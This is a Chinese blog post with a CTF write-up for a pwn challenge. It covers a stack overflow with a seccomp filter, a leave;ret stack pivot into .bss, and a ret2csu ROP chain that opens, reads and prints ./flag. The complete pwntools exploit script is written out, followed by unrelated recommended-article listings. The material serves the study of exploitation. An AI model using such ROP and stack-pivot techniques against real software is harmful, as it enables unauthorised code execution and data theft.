解题记录(3)

最新推荐文章于 2025-08-11 16:50:22 发布
原创 最新推荐文章于 2025-08-11 16:50:22 发布 · 365 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #rop #栈

这是一篇关于解决一个包含栈溢出漏洞的ROP题目记录。由于没有Canary和PIE保护,通过栈溢出控制返回地址。由于seccomp限制,无法直接执行system或execve获取shell。解决方案是利用open和read函数读取flag,通过构造栈数据和栈迁移实现目标。

解题记录(3)

这道题是一个rop的题目,漏洞利用很简单,但这题有不一样的地方

题目

如下,没有Canary和PIE保护,因此能够想到的就是栈溢出了
在这里插入图片描述
main函数如下
在这里插入图片描述

从main函数中,能够直观的发存在一个栈溢出
但是这里能够发现的是只能够溢出0x10字节,也就是只能控制程序的返回地址和基地址

再来看看init函数里面的东西
在这里插入图片描述

seccomp(全称securecomputing mode)是linuxkernel从2.6.23版本开始所支持的一种安全机制。通过seccomp,我们限制程序使用某些系统调用,这样可以减少系统的暴露面,同时是程序进入一种“安全”的状态。

那么很明显,这里不能使用系统调用,就没办法获取shell了

分析

不能够执行system或者execve函数,但程序中的函数还是能使用的
我们的目的是获去flag,那么只需要调用open函数去打开flag文件,然后用read去读取,之后在打印出来即可
对于溢出只能溢出0x10字节,这里就需要借助main中第一个read了

这里的buf是处于bss段的,因此可以在这里构造栈数据,之后通过溢出 的0x10字节,修改rbp和rip进行栈迁移就行了在这里插入图片描述栈迁移

需要借助指令leave
这条指令会将rbp的值赋值给rsp,然后执行pop rbp
main函数执行完后就会执行
leave; retn
加入溢出的0x10字节是fake_rbp = 0x600000和fake_rip = leave_addr
那么leave执行后rsp = rbp,rbp = 0x600000
然后执行retn在去执行leave
那么rsp = rbp = 0x600000,这样就完成了栈迁移

exp

from pwn import *
p = process('./ROP')
elf = ELF('./ROP')
libc = ELF('/home/sixi/Desktop/libc-2.23.so')

def debug():
	gdb.attach(p)
	pause()

loc_6pr = 0x400a36
loc_call = 0x400a20

bss_addr = 0x6010a0 - 0x8
leave = 0x40090d
rdi_ret = 0x400a43
main = elf.sym['main']

p.recvuntil("It's just a little bit harder...Do you think so?\n")
payload = p64(loc_6pr)
payload += p64(1) + p64(0) + p64(1) + p64(elf.got['open']) + p64(0x100) + p64(0) + p64(bss_addr + 0x8 * 10)
payload += p64(loc_call)
payload += b'./flag\x00\x00' + p64(0) + p64(1) + p64(elf.got['read']) + p64(0x100) + p64(bss_addr) + p64(4)
payload += p64(loc_call)
payload += p64(0) * 7 + p64(rdi_ret) + p64(bss_addr) + p64(elf.sym['puts'])

p.send(payload)
payload1 = b'a' * 0x50 + p64(bss_addr) + p64(leave)
p.recvline()
p.send(payload1)
p.recvline()
print(p.recvline())
Buuctf reserve3解题记录
jsbbd12的博客
07-31 582
buuctf reserve3解题记录
web安全解题记录
weixin_57478708的博客
02-03 2124
web解题时的一些记录,图片均是从各路博主的博客或者百度中截图,只是为了方便查看,若有侵权请告知,我会删除,感谢!
迁移浅析
qq_43409582的博客
11-23 4330
0x00 线下有道迁移的题目,因为当时没有好好学,对于迁移这一块儿一知半解的,就没出,痛定思痛,在此就好好研究一下。 0x01 前置知识 首先迁移就是因为可写空间太小不够rop,就把迁移到别的地方去构造payload。 而迁移最重要的是两个汇编命令 leave; ret; leave相对于是mov esp,ebp;pop ebp; ret是pop eip; 0x02 stack pivoting 先从32位来理解迁移的利用原理。 stack pivoting,正如它所描述的,该技巧就是劫持指针
moectf解题记录
lhx666lhx666lhx的博客
08-11 566
buuctf crypto 【RSA3解题记录
jsbbd12的博客
09-08 546
buuctf刷题记录
buuctf解题记录
qq_59235193的博客
10-31 1953
buuctf解题记录
bWAPP A3 XSS注入解题记录
qq_43623492的博客
03-31 857
bWAPP A3 XSS解题记录GETPOSTJSONAJAX/JSONAJAX/XMLBack ButtonCustom HeaderEvalHREFLogin FormphpMyAdmin BBCode Tag XSSPHP_SELFRefererUser-Agent(反射型)BlogChange SecretCookies SQLiteManager XSSStored (User-Agen...
buuctf helloword 解题记录
jsbbd12的博客
07-29 225
buuctf helloword解题记录
答题活动小程序复盘记录
weixin_47395694的博客
12-07 630
上个答题活动已圆满结束了,答题活动小程序也获得了对方的认可,这是我比较欣慰的一点 每个经典的答题活动我都会复盘下,这次我从当客服的这个经历说起,总结下答题用户问的最多的几个问题 ~~ 其实我一般不开放客服入口的,其一是由于这要拿出时间来解答问题,其二,如果不能做到每次回答都有耐心,那不如不开放客服入口 在这次客服过程中遇到最多的几个问题我回顾下 1)我能不能再次答题; 2)答题之后,如何查看答题记录; 其实这两个问题小程序本身都提供,那么为什么还有这么多用户来问呢,这引起了我的注意和.
buuctf crypto 【RSA】解题记录
jsbbd12的博客
09-10 383
buuctf刷题记录
精选资源
记录ctf解题过程及脚本.zip
10-25
记录ctf解题过程及脚本
解题记录.md
11-08
解题记录.md
基于DynamicConv2的YOLOv8轻量化改进:低FLOPs场景下目标检测精度提升方法
最新发布
01-05
内容概要:本文详细介绍CVPR2024提出的DynamicConv2动态卷积技术及其在YOLOv8目标检测模型中的实战应用。DynamicConv2通过“参数动态路由+多专家机制”实现低FLOPs(浮点运算量)与高精度的兼顾,能够在轻量化场景下显著提升小目标和复杂背景下的检测性能。文章深入解析其核心原理,包括动态选择最优卷积参数、ParameterNet权重预测网络设计,并提供完整的代码实现、YOLOv8配置修改方法及训练验证流程。实验表明,在COCO和工业质检等数据集上,替换DynamicConv2后FLOPs降低25%-35%,mAP提升3-5个百分点。此外,还探讨了其在科研创新与工业落地中的广阔前景,涵盖分类、分割、边缘设备部署等多个方向。; 使用场景及目标:①在边缘设备(如树莓派、Jetson Nano)上部署高效精准的目标检测模型;②提升YOLOv8在小目标、密集目标场景下的检测精度;③开展基于动态卷积的学术研究,探索新型轻量化网络结构; 阅读建议:建议结合提供的飞书代码链接进行动手实践,重点关注DynamicConv2中专家数量设置、参数预测合理性与模型导出兼容性等问题,通过可视化专家权重分布等方式优化模型表现。
flinks是一个专门用于安全测试的Python脚本工具它通过读取用户提供的域名列表智能生成大量可能存在开放重定向漏洞的特定URL链接以供后续的漏洞扫描流程使用_该脚本的核心.zip
01-05
flinks是一个专门用于安全测试的Python脚本工具它通过读取用户提供的域名列表智能生成大量可能存在开放重定向漏洞的特定URL链接以供后续的漏洞扫描流程使用_该脚本的核心.zip
软考系统架构设计师高级资格考试备考资料库与学习辅助工具集_包含历年真题解析知识点精讲视频模拟考试系统错题本功能学习进度跟踪考试大纲解读专家讲座笔记案例分析模板论文写.zip
01-05
软考系统架构设计师高级资格考试备考资料库与学习辅助工具集_包含历年真题解析知识点精讲视频模拟考试系统错题本功能学习进度跟踪考试大纲解读专家讲座笔记案例分析模板论文写.zip
采用数字信号处理技术的呼吸频率检测系统.zip
01-05
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
山东科技大学《学术英语(理工)》复习资料&课本答案
01-05
1. 课本题目、quiz题目整理 2. 课本答案 3. 复习样题 因为考试题目大多是原题,背就可以了
三自由度机械臂自适应神经网络控制(Matlab代码实现)
01-05
三自由度机械臂自适应神经网络控制(Matlab代码实现)内容概要:本文介绍了三自由度机械臂自适应神经网络控制的Matlab代码实现方法,重点围绕机械臂的动力学建模、轨迹跟踪控制以及神经网络在控制系统中的应用展开。通过自适应神经网络算法,有效应对系统不确定性与外部干扰,提升机械臂运动的精度与鲁棒性。文中详细阐述了控制策略的设计思路、神经网络权重更新机制及仿真结果验证过程,展示了该方法在复杂轨迹跟踪任务中的良好性能。; 适合人群:具备一定自动控制理论基础和Matlab编程能力的高校学生、科研人员及从事机器人控制领域的工程技术人员。; 使用场景及目标:①用于机械臂高精度轨迹跟踪控制研究;②适用于非线性系统控制算法开发与仿真验证;③为自适应控制与智能控制算法的学习与实践提供参考案例。; 阅读建议:建议读者结合Matlab代码逐步调试运行,深入理解神经网络与自适应控制的结合机制,同时可尝试修改轨迹输入或系统参数以观察控制效果变化,从而加深对算法鲁棒性与泛化能力的理解。
【计算机教育】基于软考认证的分阶段培养模式:解决专业人才供需失衡与学习动力不足的教学改革方案
01-05
内容概要:本报告针对计算机专业教育中存在的就业供需矛盾、学生学习困境及兴趣迷失等问题,提出以软考(软件水平考试)为牵引的融合培养模式。通过分析当前毕业生数量过剩但高端复合型人才紧缺的现状,指出人才培养与社会需求脱节的核心症结,并从兴趣培养、知识体系构建和教学改革三方面提出解决方案。报告强调通过竞赛活动激发学习兴趣,以软考各级别考试为导向分阶段构建知识体系,并推动跨学科课程衔接与实践教学改革,提升学生的自主学习能力与实战水平。; 适合人群:高校计算机专业教育工作者、教学管理者及关注人才培养模式改革的研究者;具备一定专业基础、希望明确学习路径的计算机专业学生。; 使用场景及目标:①用于指导高校优化计算机专业课程体系与教学模式;②帮助学生制定分阶段学习规划,提升职业竞争力;③推动软考认证与学历教育深度融合,实现理论与实践并重的人才培养目标。; 阅读建议:此资源侧重于宏观教育改革与个体成长路径设计,建议结合实际教学环境和个人发展需求进行针对性借鉴与实施。
修改答题记录
03-18
好的,用户的问题是关于如何修改系统或平台上的答题记录。首先需要明确用户的具体需求,因为不同的系统和平台有不同的机制。可能用户是想在教育平台、在线考试系统或者问卷系统中修改记录,但每个系统的修改方法可能...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值